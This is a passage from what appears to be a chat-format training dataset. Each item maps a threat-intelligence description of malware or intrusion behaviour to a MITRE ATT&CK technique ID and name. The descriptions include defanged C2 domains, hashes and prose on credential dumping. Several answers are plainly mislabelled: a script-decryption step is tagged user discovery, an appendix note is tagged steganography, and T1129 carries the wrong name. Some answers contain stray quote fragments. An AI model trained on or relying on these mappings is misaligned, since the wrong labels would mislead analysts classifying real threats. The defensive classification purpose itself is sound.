attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware can list running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis collects OS information and the computer name from the victim’s machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following capabilities have been observed in this payload: Get drive information Modify files Modify directories Modify registry Spawn process Terminate process Modify services Kill self Ties to SunOrcal Reaver was used concurrently with SunOrcal over the past year, to include two Reaver samples dropped from zip files hosted on a domain also being used as a SunOrcal C2 (www.fyoutside[.]com), and there is also passive DNS overlap amongst the C2s" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtask or crontab to create and schedule tasks that enumerate victim devices and networks." }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT can log keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack sets up a Registry Run key to establish a persistence mechanism." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Invoke-Obfuscation calls the variable obfuscation technique used by the actors to obfuscate this script Random Case + {} + Ticks, which changes all variables in the script to have randomly cased characters, to be surrounded in curly braces and to include the tick (`) character, which is ignored in by PowerShell" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic encrypts commands from the C2 server using a hardcoded key." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used browser extensions including Google Chrome to steal passwords and cookies from browsers. Kimsuky has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 can utilize multiple methods to bypass UAC." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire has modules to interact with the Windows task scheduler." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some variants use HTTP for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RegDuke can download files from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor's installer plugin can schedule a new task that loads the dispatcher on boot/logon." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor can obtain application window titles and then determines which windows to perform Screen Capture on." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used \"reg save\" on the SYSTEM file Registry location to help extract the NTDS.dit file." }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito runs \"whoami\" on the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates the following Registry entry: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, the threat actors collected files and other data from compromised systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BOOSTWRITE has used the DWriteCreateFactory() function to load additional modules." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avaddon uses registry run keys for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER may use WMI when collecting information about a victim." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE has been executed through use of VBScripts." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NotPetya has the capability to exploit SMBv1 via the well known EternalBlue exploit. Once the exploit is launched, the shellcode will end up writing the file and executing the malware on the target machine." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "route can be used to discover routing configuration information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Domains http://mdzz2019.noip[.]cn:19931 http://mdzz2019.noip[.]cn:3654/ From my analyses, I was able to identify http://mdzz2019.noip[.]cn:19931 as its main C2 url.  This is a dynamic DNS, meaning the actual IP changes quite frequently" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When executed, the final macro code as interpreted by CMD decodes into a classic PowerShell download cradle that fetches the initial QakBot payload. There is one last bit of obfuscation here as the script does contain two more encoded strings. One is the URL as seen above in Figure 8, and another is the full path to which the payload will initially be written: “C:\\Users\\Public\\tmpdir\\file”. " }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses RC4 to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory: Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL) - Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL" }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ixeshe can collect data from a local system." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has used ftp for exfiltration." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie is able to achieve persistence via a .lnk file that is stored within the victim’s startup path" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADCALL modifies the firewall Registry key \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfileGloballyOpenPorts\\\\List\"." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We euphemistically refer to the bit fiddling function in the interest of brevity. Looking through it, we see calls to Windows APIs to acquire a cryptographic context provider and generate random bytes. It’s likely this is being used for an inlined crypto implementation and byte overwriting, but the mechanism isn’t entirely clear at this time" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerDuke has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FoggyWeb's loader has reflectively loaded .NET-based assembly/payloads into memory." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. This shellcode is charged with unpacking the encrypted and compressed payload. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the “MZ” and “PE” constants (Fig" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to list its directory and logical drives." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers are using a tool with name plainpwd in order to dump Windows credentials from memory. This tool is a slightly modified version of the open-source project mimikatz" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hikit has the ability to create a remote shell and run given commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used sc query on a victim to gather information about services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Misdat has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity" }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The executable obtains an embedded PowerShell script, decrypts it using RC4, then decompresses it using ZLIB, and saves the cleartext to C:\\Users\\\\AppData\\Roaming\\Out.jpg" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Linux has decoded XOR encoded strings holding its configuration upon execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers system configuration information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can use Native API including \"GetProcAddress\" and \"ShellExecuteW\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Traffic traversing the network will be forwarded to multiple nodes before exiting the network and continuing on to its intended destination." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Should the victim use one of these portable browsers with a proxy server configured, the malware can find that in the user’s preferences and use that proxy to communicate with its C&C servers" }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Retefe is different from most banking Trojans, which typically attack web browser software to capture login credentials before they are encrypted with SSL and sent to the bank’s web server. Instead, Retefe uses the Windows PowerShell to execute a series of commands that installs a new root certificate on the system and a proxy configuration to re-route the traffic to the targeted banking websites" }, { "role": "assistant", "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LitePower can create a scheduled task to enable persistence mechanisms." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To obtain a job, the Trojan builds a subdomain that has the following structure and issues a DNS query to the C2 server: cc The generated subdomain is then subjected to a number-to-character substitution function that is the inverse of the Table 4, which effectively converts all the digits in the subdomain into characters" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL has encrypted data with XOR before sending it over the C2 channel." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "allows adversaries to modify the way the \"beacon\" payload communicates. This is called \"Malleable C2\" in the manual and is intended to allow a penetration test team to mimic known APT C2 methods." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution. 29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Next, the loader fingerprints the Windows architecture. This is a crucial step because the loader needs to know what version of the backdoor to download (32-bit or 64-bit). Once the Windows architecture has been identified, the loader carries out the download" }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can capture information regarding the victim's OS, security, and hardware configuration." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 created a directory named \"out\" in the user's %AppData% folder and copied files to it." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The NETWIRE payload has been injected into benign Microsoft executables via process hollowing." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "achieves persistence by adding a shortcut of itself to the startup path in the Registry." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware basically provides a remote CMD/PowerShell terminal for the attackers, enabling them to execute scripts/commands and receive the results via HTTP requests" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Network activity started with an HTTPS URL to namecha[.]in, which is an alternative namecoin block explorer. Namecoin is a cryptocurrency system that can be used for decentralized DNS. That proves to be the case here, since the URL returned an IP address used for subsequent post-infection traffic as shown in Figure 10" }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BloodHound can use PowerShell to pull Active Directory information from the target environment." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can function as a proxy to create a serve that relays communication between the client and C&C server." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLUELIGHT can use different cloud providers for its C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects general system enumeration data about the infected machine and checks the OS version." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 used Base64 to obfuscate commands and the payload." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos can capture data from the system’s microphone." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete specified files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 used the \"ipconfig /all\" command to gather network configuration information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Digitally signed malware The entire bundle (VPN client and malware) was digitally signed with a valid code signing certificate issued by Symantec to AI Squared, a legitimate software company that develops accessibility software: Thumbprint: F340C0D841F9D99DBC289151C13391000366631C Serial number: 45 E4 7F 56 0B 01 B6 4E 68 39 5E 5D 79 2F 2E 09 Another Helminth sample, 1c23b3f11f933d98febfd5a92eb5c715, was signed with a different AI Squared code signing certificate: Thumbprint: 92B8C0872BACDC226B9CE4D783D5CCAD61C6158A Serial number:62 E0 44 E7 37 24 61 2D 79 4B 93 AF 97 46 13 48 This suggest that the attackers had got a hold of an Ai Squared signing key, potentially after compromising their network" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The module gathers information about the user and attempts to verify whether this is a local admin or a domain admin. This shows that after infecting the machine, Valak chooses to target mainly administrators and domain admins. This indicates a propensity to target higher profile accounts such as enterprise admins" }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account" } ] 